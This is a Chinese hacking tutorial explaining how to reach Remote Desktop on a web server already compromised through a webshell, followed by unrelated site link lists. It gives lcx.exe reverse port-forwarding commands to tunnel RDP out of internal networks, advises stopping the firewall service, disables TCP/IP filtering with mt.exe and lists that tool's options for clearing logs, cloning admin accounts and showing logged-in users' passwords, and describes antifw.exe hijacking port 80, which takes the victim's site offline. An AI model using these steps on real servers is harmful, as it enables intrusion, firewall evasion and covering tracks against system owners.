开了3389后WEB渗透远程连接不上的分析与解决
对于开了3389,连接不上,有几个方面的原因,我来总结下,哇咔咔,这几天提好几台服务器都TM这样,分析下,
原因1、远程桌面端口被更改。2、对方服务器处于内网。3、防火墙拦截。4、TCP/IP安全限制。
好了,知道原因了,我们来一个一个思考解决方法(部分引用):
远程桌面端口被更改解决方法:
现在一般的asp大马都有探测服务器的功能,在权限还行的情况下都可以直接查看远程(TerminalService)端口,或者可以查看注册表也可以得到远程桌面端口,asp权限不行,在支持aspx的时候就换aspx查看注册表。
对方服务器处于内网解决方法:
这种情况我们可以使用lcx做端口转发,不知道的或者没有的就百度“lcx。exe下载”,我就不提供下载了。
使用方法:
1。上传lcx。exe到目标服务器可执行目录
2。本地主机启动lcx。exe监听,命令:
lcx。exe-listen19884567//监听1988端口并转发到4567端口
在目标主机运行:
格式为:
lcx。exe-slave你的IP你监听的端口肉机IP要转发的目标主机端口
例子:lcx。exe-slave192。168。86。11988192。168。86。33389
3。本地链接:127。0。0。1:1988
OK,有点小麻烦,不过还是很管用的,要是你也是内网,你就做下端口映射就好了,映射到转发回来的端口,哇咔咔。
4、防火墙拦截解决办法:
一般还是先试试端口转发,还是利用LCX,
使用方法:
lcx。exe-slave你的IP你监听的端口肉机要转发的目标主机端口
例子:lcx。exe-slave192。168。86。11988192。168。86。33389
然后本地连接:127。0。0。1:1988就搞定了。
如果还不行。。要是web是SYSTEM权限,直接停掉防火墙服务就没问题了。
5、TCP/IP安全策略限制。
这个解决方法就有点多了,可以使用MT。EXE来关闭策略,
使用方法:
1。上传mt。exe到目标服务器可执行目录
2。执行命令:mt。exe-filteroff
这样就关闭了TCP/IP限制了
选项:
-filter—更改TCP/IP过滤器的开头状态
-addport—添加端口到过滤器的允许列表
-setport—设置端口作为过滤器的允许列表
-nicinfo—列出TCP/IP界面信息
-pslist—列出活动进程
-pskill—杀毒指定进程
-dlllist—列出指定进程的DLL
-sysinfo—列出系统信息
-shutdown—关闭系统
-reboot—重启系统
-poweroff—关闭电源
-logoff—注销当前用户会话
-chkts—检查终端服务信息
-setupts—安装终端服务
-remts—卸载终端服务
-chgtsp—重置终端服务端口
-clog—清除系统日志
-enumsrv—列出所有服务
-querysrv—列出指定服务的详细信息
-instsrv—安装一个服务
-cfgsrv—更改服务配置
-remsrv—卸载指定服务
-startsrv—启动指定服务
-stopsrv—停止指定服务
-netget—从http/ftp下载
-redirect—端口重定向
-chkuser—列出所有账户、sid和anti克隆
-clone—克隆admin到目标
-never—设置账户看上去从未登录
-killuser—删除账户,甚至是“guest”也可删除
-su—以Local_System权限运行进程
-findpass—显示所有已登录用户的口令
-netstat—列出TCP连接
-killtcp—杀死TCP连接
-psport—映射端口到进程
-touch—设置文件日期和时间到指定值
-secdel—安全擦除文件或目录占用的空间
-regshell—进入一个控制台注册表编辑器
-chkdll—检测ginadll后门
上面只是一种方法,再说一种好用的方法吧,成功率灰常高,哇咔咔。
使用antifw。exe这个工具,
使用方法:
在cmd下输入
antifw-s运行程序停止iis将3389改为80
antifw-l关闭程序。恢复iis
连接的时候直接连接他的80端口就OK了,内网外网通杀!成功率比较高。但是这样他网站就访问不了。。。
没事,上去了我们赶紧分析原因,排除万难,把限制去掉,再给他还原80端口,哇咔咔。。。
相关推荐
- 【其他】 WPS表格Unicode文本 04-30
- 【其他】 WPS表格unique 04-30
- 【其他】 WPS表格utf-8 04-30
- 【其他】 WPS表格u盘删除怎么恢复 04-30
- 【其他】 WPS表格运行慢,卡怎么办解决 04-30
- 【其他】 WPS表格与Excel的区别 04-30
- 【其他】 哔哩哔哩漫画怎么完成今日推荐任务 04-30
- 【其他】 WPS表格隐藏的列怎么显示出来 04-30
- 【其他】 WPS表格图片怎么置于文字下方 04-30
- 【其他】 WPS表格图片怎么跟随表格 04-30
本周热门
-
1
iphone序列号查询官方入口在哪里 2024/04/11 -
2
oppo云服务平台登录入口 2020/05/18 -
3
输入手机号一键查询快递入口网址大全 2024/04/11 -
4
苹果官网序列号查询入口 2023/03/04 -
5
outlook邮箱怎么改密码 2024/01/02 -
6
steam账号怎么注册 2023/02/27 -
7
fishbowl鱼缸测试网址 2024/04/15 -
8
光信号灯不亮是怎么回事 2024/04/15
本月热门
-
1
iphone序列号查询官方入口在哪里 2024/04/11
-
2
输入手机号一键查询快递入口网址大全 2024/04/11
-
3
oppo云服务平台登录入口 2020/05/18
-
4
outlook邮箱怎么改密码 2024/01/02
-
5
mbti官网免费版2024入口 2024/04/11 -
6
苹果官网序列号查询入口 2023/03/04
-
7
光信号灯不亮是怎么回事 2024/04/15
-
8
fishbowl鱼缸测试网址 2024/04/15
-
9
计算器上各个键的名称及功能介绍大全 2023/02/21 -
10
网线水晶头颜色顺序图片 2020/08/11